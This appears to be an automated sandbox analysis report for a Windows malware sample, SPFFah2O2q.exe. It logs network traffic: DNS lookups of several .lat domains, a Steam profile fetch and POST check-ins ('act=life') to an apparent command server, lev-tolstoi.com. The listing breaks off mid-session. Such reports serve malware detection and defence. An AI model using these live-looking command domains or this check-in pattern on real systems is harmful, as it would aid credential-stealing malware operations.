                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.092966080 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.092988014 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.093000889 CET49706443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.093007088 CET44349706172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.127053022 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.127101898 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.127203941 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.127489090 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:16.127504110 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.432085991 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.432243109 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.434362888 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.434375048 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.434793949 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.436364889 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.436389923 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:17.436501026 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190265894 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190324068 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190356970 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190391064 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190417051 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190424919 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190450907 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190462112 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190491915 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.190499067 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.201265097 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.201339960 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.201349974 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.209037066 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.209100008 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.209110022 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.259757996 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.311769962 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.353533030 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.400408983 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.404155970 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.404232979 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.404251099 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.411540031 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.411627054 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.411634922 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.411652088 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.411745071 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.412050009 CET49707443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.412065029 CET44349707172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.619740963 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.619801998 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.619873047 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.620191097 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:18.620203018 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.926975012 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.927099943 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.928695917 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.928709984 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.928989887 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.930366993 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.930551052 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:19.930576086 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:20.828052998 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:20.828305960 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:20.828392982 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:20.829725981 CET49708443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:20.829760075 CET44349708172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:21.334813118 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:21.334878922 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:21.334979057 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:21.336921930 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:21.336940050 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:22.644203901 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:22.644352913 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:22.645886898 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:22.645900965 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:22.646150112 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:22.647351980 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:22.647485971 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:22.647522926 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:22.647577047 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:22.695365906 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:23.479295015 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:23.479418993 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:23.479475021 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:23.479603052 CET49709443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:23.479624987 CET44349709172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:24.079415083 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:24.079466105 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:24.079533100 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:24.079894066 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:24.079909086 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:25.385822058 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:25.385902882 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:25.387362003 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:25.387372971 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:25.387623072 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:25.388747931 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:25.388911963 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:25.388947010 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:25.391304970 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:25.391321898 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:26.353596926 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:26.353694916 CET44349711172.67.157.254192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:26.355053902 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:26.357729912 CET49711443192.168.2.8172.67.157.254
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:26.357754946 CET44349711172.67.157.254192.168.2.8

                                                                                                                                                                                                                                                              UDP Packets

                                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:08.211463928 CET5615453192.168.2.81.1.1.1
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:08.525264025 CET53561541.1.1.1192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:08.692867041 CET5483953192.168.2.81.1.1.1
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:08.912846088 CET53548391.1.1.1192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.069993019 CET6441653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.292149067 CET53644161.1.1.1192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.293848991 CET5219653192.168.2.81.1.1.1
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.689445972 CET53521961.1.1.1192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.692827940 CET5258153192.168.2.81.1.1.1
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.917278051 CET53525811.1.1.1192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.922658920 CET5740753192.168.2.81.1.1.1
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.146234989 CET53574071.1.1.1192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.149481058 CET5851553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.367129087 CET53585151.1.1.1192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.369987011 CET5801853192.168.2.81.1.1.1
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.680685043 CET53580181.1.1.1192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.683758974 CET5738553192.168.2.81.1.1.1
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.821497917 CET53573851.1.1.1192.168.2.8
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.842747927 CET5946053192.168.2.81.1.1.1
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.017322063 CET53594601.1.1.1192.168.2.8

                                                                                                                                                                                                                                                              DNS Queries

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:08.211463928 CET192.168.2.81.1.1.10x3c45Standard query (0)aspecteirs.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:08.692867041 CET192.168.2.81.1.1.10xa11eStandard query (0)grannyejh.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.069993019 CET192.168.2.81.1.1.10x2d7bStandard query (0)discokeyus.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.293848991 CET192.168.2.81.1.1.10x429Standard query (0)necklacebudi.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.692827940 CET192.168.2.81.1.1.10xc869Standard query (0)energyaffai.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.922658920 CET192.168.2.81.1.1.10x9455Standard query (0)sustainskelet.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.149481058 CET192.168.2.81.1.1.10xfdd5Standard query (0)crosshuaht.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.369987011 CET192.168.2.81.1.1.10xfc09Standard query (0)rapeflowwj.latA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.683758974 CET192.168.2.81.1.1.10x724dStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:13.842747927 CET192.168.2.81.1.1.10xce40Standard query (0)lev-tolstoi.comA (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                              DNS Answers

                                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:08.525264025 CET1.1.1.1192.168.2.80x3c45Name error (3)aspecteirs.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:08.912846088 CET1.1.1.1192.168.2.80xa11eName error (3)grannyejh.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.292149067 CET1.1.1.1192.168.2.80x2d7bName error (3)discokeyus.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.689445972 CET1.1.1.1192.168.2.80x429Name error (3)necklacebudi.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:09.917278051 CET1.1.1.1192.168.2.80xc869Name error (3)energyaffai.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.146234989 CET1.1.1.1192.168.2.80x9455Name error (3)sustainskelet.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.367129087 CET1.1.1.1192.168.2.80xfdd5Name error (3)crosshuaht.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.680685043 CET1.1.1.1192.168.2.80xfc09Name error (3)rapeflowwj.latnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:10.821497917 CET1.1.1.1192.168.2.80x724dNo error (0)steamcommunity.com23.55.153.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.017322063 CET1.1.1.1192.168.2.80xce40No error (0)lev-tolstoi.com172.67.157.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                              Dec 26, 2024 12:57:14.017322063 CET1.1.1.1192.168.2.80xce40No error (0)lev-tolstoi.com104.21.66.86A (IP address)IN (0x0001)false

                                                                                                                                                                                                                                                              HTTP Request Dependency Graph

                                                                                                                                                                                                                                                              • steamcommunity.com
                                                                                                                                                                                                                                                              • lev-tolstoi.com

                                                                                                                                                                                                                                                              HTTPS Proxied Packets

                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              0192.168.2.84970523.55.153.106443768C:\Users\user\Desktop\SPFFah2O2q.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-26 11:57:12 UTC219OUTGET /profiles/76561199724331900 HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Host: steamcommunity.com
                                                                                                                                                                                                                                                              2024-12-26 11:57:13 UTC1905INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Server: nginx
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.fastly.steamstatic.com/ https://cdn.fastly.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.fastly.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                                                                                                                                                                                                              Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Date: Thu, 26 Dec 2024 11:57:13 GMT
                                                                                                                                                                                                                                                              Content-Length: 35121
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: sessionid=0554ce0e0c1fbcf08e424b14; Path=/; Secure; SameSite=None
                                                                                                                                                                                                                                                              Set-Cookie: steamCountry=US%7C185ce35c568ebbb18a145d0cabae7186; Path=/; Secure; HttpOnly; SameSite=None
                                                                                                                                                                                                                                                              2024-12-26 11:57:13 UTC14479INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0a 09 09 3c 74 69 74 6c 65 3e
                                                                                                                                                                                                                                                              Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><title>
                                                                                                                                                                                                                                                              2024-12-26 11:57:13 UTC10097INData Raw: 2e 63 6f 6d 2f 3f 73 75 62 73 65 63 74 69 6f 6e 3d 62 72 6f 61 64 63 61 73 74 73 22 3e 0a 09 09 09 09 09 09 42 72 6f 61 64 63 61 73 74 73 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 61 62 6f 75 74 2f 22 3e 0a 09 09 09 09 41 62 6f 75 74 09 09 09 3c 2f 61 3e 0a 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 6d 65 6e 75 69 74 65 6d 20 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 68 65 6c 70 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f 65 6e 2f 22 3e 0a 09 09 09 09 53 55 50 50 4f 52 54 09
                                                                                                                                                                                                                                                              Data Ascii: .com/?subsection=broadcasts">Broadcasts</a></div><a class="menuitem " href="https://store.steampowered.com/about/">About</a><a class="menuitem " href="https://help.steampowered.com/en/">SUPPORT
                                                                                                                                                                                                                                                              2024-12-26 11:57:13 UTC10545INData Raw: 4e 49 56 45 52 53 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 70 75 62 6c 69 63 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4c 41 4e 47 55 41 47 45 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 65 6e 67 6c 69 73 68 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 43 4f 55 4e 54 52 59 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 55 53 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 43 4f 4d 4d 55 4e 49 54 59 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 5c 2f 5c 2f 63 64 6e 2e 66 61 73 74 6c 79 2e 73 74 65 61 6d 73 74 61 74 69 63 2e 63 6f 6d 5c 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 5c 2f 70 75 62 6c 69 63 5c 2f 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 4d 45 44 49 41 5f 43 44 4e 5f 55 52 4c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74
                                                                                                                                                                                                                                                              Data Ascii: NIVERSE&quot;:&quot;public&quot;,&quot;LANGUAGE&quot;:&quot;english&quot;,&quot;COUNTRY&quot;:&quot;US&quot;,&quot;MEDIA_CDN_COMMUNITY_URL&quot;:&quot;https:\/\/cdn.fastly.steamstatic.com\/steamcommunity\/public\/&quot;,&quot;MEDIA_CDN_URL&quot;:&quot;htt


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              1192.168.2.849706172.67.157.254443768C:\Users\user\Desktop\SPFFah2O2q.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-26 11:57:15 UTC262OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
                                                                                                                                                                                                                                                              2024-12-26 11:57:15 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                                                                                                                                                                              Data Ascii: act=life
                                                                                                                                                                                                                                                              2024-12-26 11:57:16 UTC1123INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Thu, 26 Dec 2024 11:57:15 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=0poos4lftqri5ukk9gti59jv2e; expires=Mon, 21 Apr 2025 05:43:54 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xQ2iQjvtGVOk4wxcuu%2BYermqv%2BaTxb6OpaLblA1hqFqXDYjEDvDjNNZ89ffuMN7ooDwW%2B3UJpN5cRh3nCzzoM4N9csitSLxYwH0Mz8qAaYGpWOE21iKpWVLppirMq0sKcD0%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f80e46c98cc1a0b-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1917&min_rtt=1906&rtt_var=738&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2835&recv_bytes=906&delivery_rate=1460000&cwnd=249&unsent_bytes=0&cid=81505d6f12192872&ts=774&x=0"
                                                                                                                                                                                                                                                              2024-12-26 11:57:16 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 2ok
                                                                                                                                                                                                                                                              2024-12-26 11:57:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              2192.168.2.849707172.67.157.254443768C:\Users\user\Desktop\SPFFah2O2q.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-26 11:57:17 UTC263OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 74
                                                                                                                                                                                                                                                              Host: lev-tolstoi.com
